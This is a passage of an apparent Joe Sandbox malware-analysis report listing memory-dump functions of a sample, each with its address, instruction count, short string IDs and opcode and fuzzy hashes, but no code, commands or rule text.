                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: +g
                                    • API String ID: 0-1100455182
                                    • Opcode ID: b497a9056d368b15815eb815a758f68912eee0890222fe8a37e0edcd30cf6043
                                    • Instruction ID: 9aab33468076353b7f2e3656d37b62d28f6b4aadd8b096dac98968f47500e8d2
                                    • Opcode Fuzzy Hash: b497a9056d368b15815eb815a758f68912eee0890222fe8a37e0edcd30cf6043
                                    • Instruction Fuzzy Hash: DFD18E705686558FEB49CF08C0D45B937B2FF85350B5446BDD84ECB68AEA38F882CB91
                                    Function 00007FF887B1370F Relevance: 1.6, Strings: 1, Instructions: 333COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: +g
                                    • API String ID: 0-1100455182
                                    • Opcode ID: fe21ca88ada280fdb788d0d66457e4855c8a4c3d7d2c84a05c34c72000e188c5
                                    • Instruction ID: 3bf47f89fbbe0de9f77837ba18a6e6d8ad5a32a64246a591be595cddf8a26e4d
                                    • Opcode Fuzzy Hash: fe21ca88ada280fdb788d0d66457e4855c8a4c3d7d2c84a05c34c72000e188c5
                                    • Instruction Fuzzy Hash: 65C1BF305686568BEB4DCF08C0D45B937B2FF45350B5446BDD84ECB68AEA38F882CB91
                                    Function 00007FF887B2453E Relevance: 1.5, Strings: 1, Instructions: 285COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: b4f
                                    • API String ID: 0-3391181744
                                    • Opcode ID: 11037644fea4d231d2047de2cdeade998a96aa45cd288000b06ab0eb81072501
                                    • Instruction ID: 017dea9c97b8127c0c71ab97e02c32516dc8fd8ca5bd7a37c759fed745dbda49
                                    • Opcode Fuzzy Hash: 11037644fea4d231d2047de2cdeade998a96aa45cd288000b06ab0eb81072501
                                    • Instruction Fuzzy Hash: 53A1F83096D5568FEB59CF18C4906B87BB2FF55320F9445F9C84ACB58BDA38AC82CB41
                                    Function 00007FF887B0D466 Relevance: 1.5, Strings: 1, Instructions: 266COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: OK_H
                                    • API String ID: 0-3688398191
                                    • Opcode ID: faf9fbd8cd2cb8cf90f0b9800247edc5b675e5811cb419c03ecac2b0943d6452
                                    • Instruction ID: 511140617fdeb0af82e79f63716bc3f5da39d2ff341e395ab9637ace90062644
                                    • Opcode Fuzzy Hash: faf9fbd8cd2cb8cf90f0b9800247edc5b675e5811cb419c03ecac2b0943d6452
                                    • Instruction Fuzzy Hash: 1981253194CA868FE3689A68941517DB7F2FF8A394F14057EE48ED31D2DE2CB842C752
                                    Function 00007FF887B0BDCB Relevance: 1.5, Strings: 1, Instructions: 232COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: /f
                                    • API String ID: 0-1716792727
                                    • Opcode ID: dba33eeadd1a91e501b42b0e1304ea1b5aa7d3a73200d9052f797ead090c102f
                                    • Instruction ID: 62f2984783eb53a16aff5121800495348925f2baf68fe32fbd27d210f4ed6019
                                    • Opcode Fuzzy Hash: dba33eeadd1a91e501b42b0e1304ea1b5aa7d3a73200d9052f797ead090c102f
                                    • Instruction Fuzzy Hash: AB718030D5C64E8EEB99DB6488546FEBBB2FF59384F5005BAD00EE7191DE386841CB41
                                    Function 00007FF887B1120B Relevance: 1.5, Strings: 1, Instructions: 231COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: /f
                                    • API String ID: 0-1716792727
                                    • Opcode ID: c62d3d33710e04ccd28498e4454904ba5a8665bacb25c4db90d99838356f11c0
                                    • Instruction ID: 70e741497d9ab9cf4a42b7754b336021ef9107af2340a2454d73d0e4220608b2
                                    • Opcode Fuzzy Hash: c62d3d33710e04ccd28498e4454904ba5a8665bacb25c4db90d99838356f11c0
                                    • Instruction Fuzzy Hash: 68719C30D5CA4EDEEB99DB6888546FCBBB2FF49380F5404B9D00ED7186EE286841C761
                                    Function 00007FF887B09588 Relevance: 1.5, Strings: 1, Instructions: 218COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 6f
                                    • API String ID: 0-1413909991
                                    • Opcode ID: a609bf3a86e6c2fc7106bb78d579acfc43de2eed1ec9930e1f1d64d21b5df347
                                    • Instruction ID: e413e40fec3faff40c4cac49deadc2f5c6bccfc7d6316b88713b2c2823bcc5f3
                                    • Opcode Fuzzy Hash: a609bf3a86e6c2fc7106bb78d579acfc43de2eed1ec9930e1f1d64d21b5df347
                                    • Instruction Fuzzy Hash: D781C970A48A1D8FDBA9EF58C895BA9B3B5FF59701F5001E9E00DE7251CA34AE81CF40
                                    Function 00007FF887B10262 Relevance: 1.4, Strings: 1, Instructions: 171COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: AK_^
                                    • API String ID: 0-3486760717
                                    • Opcode ID: 6046387fda1cc7ac9159d5daefc135df9a52a928b1ccc0ac68ee6606507d6055
                                    • Instruction ID: 96787b6f20518edb7f71642f0157b6b5453d062cd49235774f16ce2f60ba16e6
                                    • Opcode Fuzzy Hash: 6046387fda1cc7ac9159d5daefc135df9a52a928b1ccc0ac68ee6606507d6055
                                    • Instruction Fuzzy Hash: 3C510432D0C69A9FDB01EBACE8512EC7BB1FF46365B1801B7D10CCA193DE28A845C795
                                    Function 00007FF887AF2195 Relevance: 1.4, Strings: 1, Instructions: 139COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0Wp
                                    • API String ID: 0-545783698
                                    • Opcode ID: 38d67fb90d6ded7fd4b9111dbb1571bfa7fdaf99c63f1810b269f73d35a69234
                                    • Instruction ID: 6820dc614b942be95b98d231e347603b0822c8e686e96a601b2f4ac27681fc4b
                                    • Opcode Fuzzy Hash: 38d67fb90d6ded7fd4b9111dbb1571bfa7fdaf99c63f1810b269f73d35a69234
                                    • Instruction Fuzzy Hash: 7341F73194DA8A4FE795D77898562BD7BF0FF46390B0505BBD44CC71D6DD28A881C342
                                    Function 00007FF887B14F05 Relevance: 1.4, Strings: 1, Instructions: 138COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 0Dp
                                    • API String ID: 0-130486976
                                    • Opcode ID: 7a1b9e1ee4e853b972b50b2f29baa6569299b4304e2ea3008f457feb52e01ae3
                                    • Instruction ID: d990c2e104a5436546c82f1d38375a89a4496ce5404310e824c4c15313a86269
                                    • Opcode Fuzzy Hash: 7a1b9e1ee4e853b972b50b2f29baa6569299b4304e2ea3008f457feb52e01ae3
                                    • Instruction Fuzzy Hash: 7E41C331A5CC4A8FE699E7289058ABD73E3FF983A0B544575D00EC72D6EE28EC42C751
                                    Function 00007FF887B0EA10 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: b4f
                                    • API String ID: 0-3391181744
                                    • Opcode ID: cd8b8915d6ad1997271503355908e054f4ee1bd60d06e63c439263713f2952a6
                                    • Instruction ID: 9db04322935373bf8a03e53782d81b11ab851bca3ad64797f3b2e2409e7bf85e
                                    • Opcode Fuzzy Hash: cd8b8915d6ad1997271503355908e054f4ee1bd60d06e63c439263713f2952a6
                                    • Instruction Fuzzy Hash: 2C41E230D5C55A8EEB68EA1884507FCB7B2FF98350F1486FAC04ED71A6DD38A985C781
                                    Function 00007FF887B0B119 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: Xi
                                    • API String ID: 0-2610085338
                                    • Opcode ID: 7ff7f2275750c7b4ea8b23abe46c7e2a60dbcb183891d12a0166aa24f834f29f
                                    • Instruction ID: 51c9831bed06b5705aa466843086b7f52a3b0f5e3836ff2bba287279b03dd3d3
                                    • Opcode Fuzzy Hash: 7ff7f2275750c7b4ea8b23abe46c7e2a60dbcb183891d12a0166aa24f834f29f
                                    • Instruction Fuzzy Hash: E9412C31D6894D8FDB88DF98D854AEEBBB2FF58384F500179D00EE7295DA38A841CB40
                                    Function 00007FF887B13A80 Relevance: 1.4, Strings: 1, Instructions: 112COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: b4f
                                    • API String ID: 0-3391181744
                                    • Opcode ID: ca138527fadcd33372fc08e9e7ff33f2ae16fd0f1186f5de5f83f89be28c086a
                                    • Instruction ID: bdab9d0faca11ad5c615097d693bc20fb7fe198c28d231d6931cccf2cfe66459
                                    • Opcode Fuzzy Hash: ca138527fadcd33372fc08e9e7ff33f2ae16fd0f1186f5de5f83f89be28c086a
                                    • Instruction Fuzzy Hash: 90313430D5C9AA8AFB68C61884246FD77B2FF94350F1486BAE04EC7186FD38E985C751
                                    Function 00007FF887B0B319 Relevance: 1.4, Strings: 1, Instructions: 111COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: m
                                    • API String ID: 0-1228489174
                                    • Opcode ID: 8a7259e4e8d06f93f09846140021879f64119a70ab385bcc1d8136f655892ef4
                                    • Instruction ID: 8c65fdba4da6d56998c12ee9437f46331811605980d57450237375d3320f2f79
                                    • Opcode Fuzzy Hash: 8a7259e4e8d06f93f09846140021879f64119a70ab385bcc1d8136f655892ef4
                                    • Instruction Fuzzy Hash: 7231F631D8D2969BF32956685C196BF36B2FF423E8F1401BAD44E975C2DD0C2841DB92
                                    Function 00007FF887B097C9 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: 6f
                                    • API String ID: 0-1413909991
                                    • Opcode ID: f7545289ed7d092daa452668f2bec224010d5f4a8ac99fcb244be92a6fc432dc
                                    • Instruction ID: d9d312453d24b9223f6ec7efb2ca2b8e1fc93172ef267ebb8f7b23f64d9c7ee2
                                    • Opcode Fuzzy Hash: f7545289ed7d092daa452668f2bec224010d5f4a8ac99fcb244be92a6fc432dc
                                    • Instruction Fuzzy Hash: 61311C70A995199FDB99DB58D495BFCB3B6FF59740F5014A8D00DE3281CE34AA81CB01
                                    Function 00007FF887AF37BA Relevance: 1.3, Strings: 1, Instructions: 96COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: b4f
                                    • API String ID: 0-3391181744
                                    • Opcode ID: 0737120213d0bfa31c5e912eb0a2507be9fa2cf51f20f3e62f492ff7a6c23bab
                                    • Instruction ID: cd770a768a5bd5b69ded39778361b90656dd9ee5348189157b63d8f655d4df86
                                    • Opcode Fuzzy Hash: 0737120213d0bfa31c5e912eb0a2507be9fa2cf51f20f3e62f492ff7a6c23bab
                                    • Instruction Fuzzy Hash: BD319E71A1990A8FE748DFA8E8153ED7BF1EB96391F50017AC00DC72C6CBB92455CB41
                                    Function 00007FF887B0CA54 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: r6f
                                    • API String ID: 0-3006726731
                                    • Opcode ID: 07e1ce489ebc4d1c1316d6b421f08e8bf051a95d343eab5a8622b389c37ab8a7
                                    • Instruction ID: bf894f29721717b54d1c6a604d10df2ec5688b0cd7a873b722af0667825ecff5
                                    • Opcode Fuzzy Hash: 07e1ce489ebc4d1c1316d6b421f08e8bf051a95d343eab5a8622b389c37ab8a7
                                    • Instruction Fuzzy Hash: 4D312C71A5C90A9FDB58DB58D4915ACB3F2FF88750B44427AD00EE3686DF28BC12CB80
                                    Function 00007FF887B11FBE Relevance: 1.3, Strings: 1, Instructions: 90COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: r6f
                                    • API String ID: 0-3006726731
                                    • Opcode ID: 3e2b9eaca5039d3b49eba3aa326bb49fb657200b4f3e541a85eeea21c04845bc
                                    • Instruction ID: 8a1c9390925af0d5f836313faff3d79479e0b45713f2a6c88ac9c56323957f04
                                    • Opcode Fuzzy Hash: 3e2b9eaca5039d3b49eba3aa326bb49fb657200b4f3e541a85eeea21c04845bc
                                    • Instruction Fuzzy Hash: DA21B671E4C58A4FE758A7A898652FC77F2FF59390F080179D05DC35C3ED186846C661
                                    Function 00007FF887B10E82 Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: r6f
                                    • API String ID: 0-3006726731
                                    • Opcode ID: 66f78a834680ba2eb309f70d2d80c18e9a4d054a8c39591a0b18068f961d2fcd
                                    • Instruction ID: 7a9ab1a4794e3f69f9e2b4aa12215858103913b2b995d146b447d8d371e0b0be
                                    • Opcode Fuzzy Hash: 66f78a834680ba2eb309f70d2d80c18e9a4d054a8c39591a0b18068f961d2fcd
                                    • Instruction Fuzzy Hash: 7821D531E1891D9FDF98DB58D495AEDB7B2FB68310F0041AAD00EE3291CA35A981CB50
                                    Function 00007FF887B0B722 Relevance: 1.3, Strings: 1, Instructions: 66COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: m
                                    • API String ID: 0-1228489174
                                    • Opcode ID: 2e7171595cce0e8ce630085323ecee421f1cc23e23ec7f2e4dce0724b419d378
                                    • Instruction ID: 4a60fecf58a9a96cc106cf179288e84dc317c7fff763d0cb068a1727e219a7b8
                                    • Opcode Fuzzy Hash: 2e7171595cce0e8ce630085323ecee421f1cc23e23ec7f2e4dce0724b419d378
                                    • Instruction Fuzzy Hash: 7C219F21D8D2C28FF32A42781C296BE3EB27F42798F1941FED4899A4E3DD4C1845DB52
                                    Function 00007FF887B1246B Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: r6f
                                    • API String ID: 0-3006726731
                                    • Opcode ID: ac62b4e95938c4ccab5876e568b97cb87b31122386e5929faf002a09617c408c
                                    • Instruction ID: a1d2a330391606fbc0efae988f77b0de3d8b3bea9146264f535f128b7fd43c48
                                    • Opcode Fuzzy Hash: ac62b4e95938c4ccab5876e568b97cb87b31122386e5929faf002a09617c408c
                                    • Instruction Fuzzy Hash: 3E014C22B2CD4E5FE388EEAC94556F5B7E1FF68290B00467BC40EC71C6DE24A449C380
                                    Function 00007FF887AFD8F9 Relevance: .4, Instructions: 388COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AFA000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AFA000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887afa000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: f0d2064e1b0023ee3f208a8e389df98764f4c745efa2fef6181b3f339ac092e4
                                    • Instruction ID: dbf4b17b00bc817a81c5b38c9b4229aebb559029d7ab8588a27998dd904fbb0b
                                    • Opcode Fuzzy Hash: f0d2064e1b0023ee3f208a8e389df98764f4c745efa2fef6181b3f339ac092e4
                                    • Instruction Fuzzy Hash: FFE13971D19A599FEB99EBA8C4A57FCB7B1FF58340F0401BAD00DD7692CA386840CB45
                                    Function 00007FF887B0E67F Relevance: .4, Instructions: 363COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 8986781c8735715614bb6f67bb6822007a5c8ac4ca43ee55d8707152a9cd9b46
                                    • Instruction ID: a9b520ad68ad209b40197c60a528b1e57243ffa6365130c4e374dc66543ded9d
                                    • Opcode Fuzzy Hash: 8986781c8735715614bb6f67bb6822007a5c8ac4ca43ee55d8707152a9cd9b46
                                    • Instruction Fuzzy Hash: BCD1B1305586568FEB49DF18C0D45B937B2FF49350B5446BDC84B8B69BCA38F882CB81
                                    Function 00007FF887B0E69F Relevance: .3, Instructions: 334COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 27b23e1e296f6f84348d4bab3963e71f2b801f46f2eed71c391b3eda97628b74
                                    • Instruction ID: b0383b7a85586f6db3cb4ed0b25334fc518ba354d375d47e9c878f35cdac76fb
                                    • Opcode Fuzzy Hash: 27b23e1e296f6f84348d4bab3963e71f2b801f46f2eed71c391b3eda97628b74
                                    • Instruction Fuzzy Hash: 09C1BE305586568BEB5DDF18C0D05B937B2FF49350B5446BDC84B8B69BDA38E882CB81
                                    Function 00007FF887B10997 Relevance: .3, Instructions: 307COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: cb062a408886ba72073241417a1e6323f9ddd4dfc23acc08b32d69459029f5be
                                    • Instruction ID: 27153412548ebf3b8efd30b0639c0b515719fed26b9dba09100ef40ed81db019
                                    • Opcode Fuzzy Hash: cb062a408886ba72073241417a1e6323f9ddd4dfc23acc08b32d69459029f5be
                                    • Instruction Fuzzy Hash: A421F632D9C1DACAF665A76924512FD7A62BF413B4F1806B7D86DC60C3CC0C2884D3A7
                                    Function 00007FF887AF1718 Relevance: .3, Instructions: 258COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 9fa1616d3db69b5a9d4631a19aaae8cc5587f8da503383b1131f3cfdd8395071
                                    • Instruction ID: 6499358198e5969f4ed95d6327990a1097597c4e5dec897fa072bb82de73fece
                                    • Opcode Fuzzy Hash: 9fa1616d3db69b5a9d4631a19aaae8cc5587f8da503383b1131f3cfdd8395071
                                    • Instruction Fuzzy Hash: 0F71AE32A58A498FDB88DE1CD8526BD77E2FF98744F14417AE45EC3282DE34A802C781
                                    Function 00007FF887B124E6 Relevance: .3, Instructions: 255COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: bc53fc20b967c6ecf9e4c1759affe55fe6c11c8b7955cdd5f88f311d053e35ba
                                    • Instruction ID: 6fa23488d5111dcbfbc7fdcab17fb3cab4ac3011d90eaa1ef6c7256c53b938ab
                                    • Opcode Fuzzy Hash: bc53fc20b967c6ecf9e4c1759affe55fe6c11c8b7955cdd5f88f311d053e35ba
                                    • Instruction Fuzzy Hash: 4C812A31A4C6464FE3689AA494611FD77F2FF55390B14057ED48EC3183ED2CB882C762
                                    Function 00007FF887B0F6C1 Relevance: .2, Instructions: 223COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: c77ad57502ff234e711faec97681d5828737519139d22f355b8c8544760c46a5
                                    • Instruction ID: 94e1b24888a17dec8188a04534703ddeff58e0ac951063a9f92860de96172f1a
                                    • Opcode Fuzzy Hash: c77ad57502ff234e711faec97681d5828737519139d22f355b8c8544760c46a5
                                    • Instruction Fuzzy Hash: 9281C130A4CB468FE3A9DB14C1945B977F2FF44340F54497EC48AD7A92DA29F842CB81
                                    Function 00007FF887B14731 Relevance: .2, Instructions: 220COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887B01000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887B01000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887b01000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6bdfd2febd22bdfa13fc650ad52155ef4267fed32aaa98e94a43f79ca2f35832
                                    • Instruction ID: 300fc947e217ac53d180d6b08a7fcde66b532a1d29197733b0cd910e5e951c32
                                    • Opcode Fuzzy Hash: 6bdfd2febd22bdfa13fc650ad52155ef4267fed32aaa98e94a43f79ca2f35832
                                    • Instruction Fuzzy Hash: B881CF3094CB46CFE369CB14D19597977F2FF443A0B14497DC48AC7A96CA29B882CBA1
                                    Function 00007FF887AF1D7D Relevance: .2, Instructions: 187COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000014.00000002.1708244209.00007FF887AF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887AF0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_20_2_7ff887af0000_zTShuhFeOCWKXCInUCSTgJmE.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 807f526946f18c3787f727d448e7fb8aedac2c633a8fd95e7e33007a09147f6b
                                    • Instruction ID: 7977c1a8f670459460aaecf0a71de19734f898e5ff20513ec130a28888ebc614
                                    • Opcode Fuzzy Hash: 807f526946f18c3787f727d448e7fb8aedac2c633a8fd95e7e33007a09147f6b
                                    • Instruction Fuzzy Hash: 3A51BD31A18A498FDB4CDE1CC8556BA77E2FF98354B14467EE44EC3286CE34E802CB81
                                    Function 00007FF887B02AAB Relevance: .2, Instructions: 170COMMON
